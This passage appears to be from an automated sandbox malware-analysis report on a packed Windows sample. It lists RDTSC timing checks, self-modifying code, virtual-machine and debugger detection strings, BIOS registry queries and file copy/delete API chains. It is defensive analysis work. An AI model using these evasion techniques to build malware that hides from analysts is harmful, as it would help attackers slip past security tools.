Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79B403 second address: 79B442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FD3C522448Ah 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FD3C522448Ch 0x00000019 popad 0x0000001a push edi 0x0000001b jmp 00007FD3C5224491h 0x00000020 pushad 0x00000021 popad 0x00000022 pop edi 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7991FC second address: 799216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3C500B9E1h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 799216 second address: 79921C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79921C second address: 799256 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD3C500B9D6h 0x00000008 jmp 00007FD3C500B9E8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 push ebx 0x00000011 jbe 00007FD3C500B9DCh 0x00000017 push eax 0x00000018 push edx 0x00000019 jg 00007FD3C500B9D6h 0x0000001f push esi 0x00000020 pop esi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A2CC7 second address: 7A2CD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FD3C5224486h 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A2CD9 second address: 7A2CE9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD3C500B9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A2CE9 second address: 7A2CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A2CEF second address: 7A2CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A28A6 second address: 7A28AC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A28AC second address: 7A28B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A28B8 second address: 7A28BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A28BC second address: 7A28D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD3C500B9D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FD3C500B9D8h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A2A2C second address: 7A2A32 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A2A32 second address: 7A2A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A2A38 second address: 7A2A4E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD3C5224491h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AF6F5 second address: 7AF6FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AF278 second address: 7AF27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B226C second address: 7B2281 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C500B9DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B2281 second address: 7B2289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B1DEC second address: 7B1DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B1F94 second address: 7B1FAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C522448Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD3C522448Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B8E7B second address: 7B8E7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B8E7F second address: 7B8E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FD3C522448Ch 0x0000000c jnc 00007FD3C5224486h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B8E91 second address: 7B8EAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3C500B9E7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B8EAC second address: 7B8EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1A02 second address: 7C1A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1A0A second address: 7C1A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007FD3C5224486h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1A1A second address: 7C1A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FD3C500B9EFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1A41 second address: 7C1A46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C18A5 second address: 7C18AF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD3C500B9D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C18AF second address: 7C18B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C3003 second address: 7C3019 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD3C500B9D6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jne 00007FD3C500B9D6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C54B0 second address: 7C54CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C5224498h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CD0FC second address: 7CD100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CBA62 second address: 7CBA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CBBB4 second address: 7CBBDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C500B9E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007FD3C500B9D6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CBBDB second address: 7CBC08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C5224491h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD3C522448Eh 0x00000012 jl 00007FD3C5224486h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CBC08 second address: 7CBC12 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD3C500B9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CC079 second address: 7CC07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CC07D second address: 7CC0A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FD3C500B9E9h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D30BA second address: 7D30C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D30C2 second address: 7D30C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2DE4 second address: 7D2E02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C5224496h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2E02 second address: 7D2E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE699 second address: 7DE69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE69D second address: 7DE6A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE6A1 second address: 7DE6D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnc 00007FD3C5224486h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FD3C5224490h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FD3C522448Dh 0x0000001e jnp 00007FD3C5224486h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE530 second address: 7DE53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD3C500B9D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE53A second address: 7DE550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C522448Ch 0x00000007 jo 00007FD3C5224486h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE550 second address: 7DE555 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE555 second address: 7DE55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2446 second address: 7E2456 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD3C500B9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2456 second address: 7E245C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E245C second address: 7E2460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2460 second address: 7E2466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E228D second address: 7E22EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C500B9E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jng 00007FD3C500B9D6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push ebx 0x00000019 jmp 00007FD3C500B9DDh 0x0000001e jmp 00007FD3C500B9E3h 0x00000023 pop ebx 0x00000024 jns 00007FD3C500B9E2h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E22EE second address: 7E22F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEB90 second address: 7EEB9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FD3C500B9D6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0B2E second address: 7F0B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F081B second address: 7F0839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C500B9E8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0839 second address: 7F0855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3C5224498h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 800682 second address: 80068A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80068A second address: 800690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 800690 second address: 800694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFE93 second address: 7FFEBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FD3C5224486h 0x00000009 jp 00007FD3C5224486h 0x0000000f jmp 00007FD3C5224493h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFEBA second address: 7FFEE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FD3C500B9EEh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFEE2 second address: 7FFEE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFEE8 second address: 7FFEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 800081 second address: 800099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jp 00007FD3C5224488h 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007FD3C522448Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 800099 second address: 80009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80009F second address: 8000AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3C522448Ah 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8000AF second address: 8000B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8000B5 second address: 8000C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FD3C5224486h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8062B4 second address: 8062CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3C500B9E1h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807E3A second address: 807E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807E40 second address: 807E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD3C500B9E8h 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807E62 second address: 807E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FD3C522448Eh 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807E7D second address: 807E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807E85 second address: 807E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 581C1C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 581B47 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 57F53E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7A87F0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003338B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00334910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00334910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0032DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0032E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0032ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00334570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00334570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0032DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0032BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0032F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00333EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00333EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003216D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00321160 GetSystemInfo,ExitProcess,0_2_00321160
                Source: file.exe, file.exe, 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware\
                Source: file.exe, 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1735801152.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1735801152.00000000010F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13286
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13337
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13283
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13297
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13305
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
